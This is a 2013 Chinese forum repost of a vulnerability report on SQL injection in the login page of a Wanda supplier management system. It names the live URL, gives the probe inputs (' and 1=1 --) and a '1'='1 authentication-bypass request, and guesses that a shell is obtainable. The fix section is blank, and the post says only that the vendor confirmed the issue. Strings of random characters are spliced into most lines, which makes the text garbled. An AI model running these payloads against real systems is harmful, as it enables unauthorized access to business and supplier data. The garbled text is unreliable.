找回密码
 立即注册
查看: 3344|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。
2 o3 `! x! ^! U3 z4 y5 k详细说明:
. L/ c8 [+ v7 z& A9 Q$ s; i! r万达scm系统登陆框sql注入。
6 M4 S3 s" \* `: F" n7 B+ k2 }$ X4 N  K$ I! {  {4 e0 a
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%274 E( X- l' J1 a9 W5 `8 y
9 X5 j; ?2 m$ t* {: e1 J& i+ |

; V: c! w5 J( Z; a6 R500错误。6 {$ ~3 b, B: u  e8 ~& C1 K

9 l; U" [7 ~. H7 z( N6 @用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。4 z' \  I* w" R6 O4 d
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
9 t; N9 U+ b( q% i- r截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
6 P- |2 C4 g% M7 g; ~& |经过分析,登陆验证的过程应该是:2 Q7 N) j8 G9 Y( \- i+ q8 p% q
6 i, ^" _+ w9 o9 P& Y' o. ^
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
) @6 x1 y" a' Qhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
  D9 {0 k/ C$ w4 n" E+ g9 Q: @7 A, H; u! x! L
oracle数据库,存在注入点。@大连万达,你怎么看?
' r; _) N, C$ d- T  Ahttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png* j3 q3 c0 k. e( l

$ u$ E, I) V7 I系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。: w4 ~: l3 F% I6 V$ I3 n
漏洞证明:
3 y! m  d$ H9 i+ r# A1 n, K) J5 K万达scm系统登陆框sql注入。
% H. x- r- h1 L5 j$ a
0 s' y7 f4 `+ Q- d( zhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%278 I" m! p0 U7 Q# j* E  q
( U- v- T0 t) h

, _8 `5 ]. ~4 G- ]" j& b500错误。0 s' b( T7 f4 l3 k

! m+ o, I! E( c/ t$ b用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
( z+ ^" `3 \# i$ M$ h/ ~" J4 ^http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png7 C# l' s; e0 M2 u7 G: n1 U$ J
: S- q) E/ H3 y  ?6 @2 G

$ f! R  W0 r, q4 c7 v/ m3 W(截图有一点问题)# [$ T/ }3 s/ i3 K, u$ j7 Z# O

) }8 V/ e$ X& \怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
& N/ v" F! J/ K4 E) b8 S6 V) _
0 h  v/ O( f; m4 b- l取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
* e" e6 d& }3 Y" I: s8 C) S8 D: s7 X: _
绕过:' Y+ g4 n0 M2 f( ^' Y
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=15 f' ~) v# O( I8 M9 W2 ]
) S, g* N/ U, Z4 F  R" s7 I  R

) i# W: ]+ u6 {- d4 W8 ~  _7 Foracle数据库,存在注入点。@大连万达,你怎么看?
6 @4 o" e) M# n+ B: g​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。5 B( ^- q' Q; f2 i5 W4 R
" B* r, z8 u5 f( k$ q0 Y7 f4 I4 F
修复方案:/ Y1 A% @9 b- R1 l! H5 W  ]
。。。" N( x/ Y8 P8 b* `9 H5 @

4 L. q- X8 [( f1 _) `- Z1 {( ]7 R1 H) T
厂商已经确认5 I, n4 l0 R. V3 |

. F0 _# A3 S% [) f5 B. ]6 x* K. s[/td][/tr]
( }/ m  }9 _/ b7 a+ O" k[/table]
/ D9 [; Q/ N3 J5 d( C/ v+ Z" ^0 z3 F4 o0 t$ j7 B) o6 f4 x& U. W: C

# k5 D/ N4 K) }" ^* h' j$ w3 U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表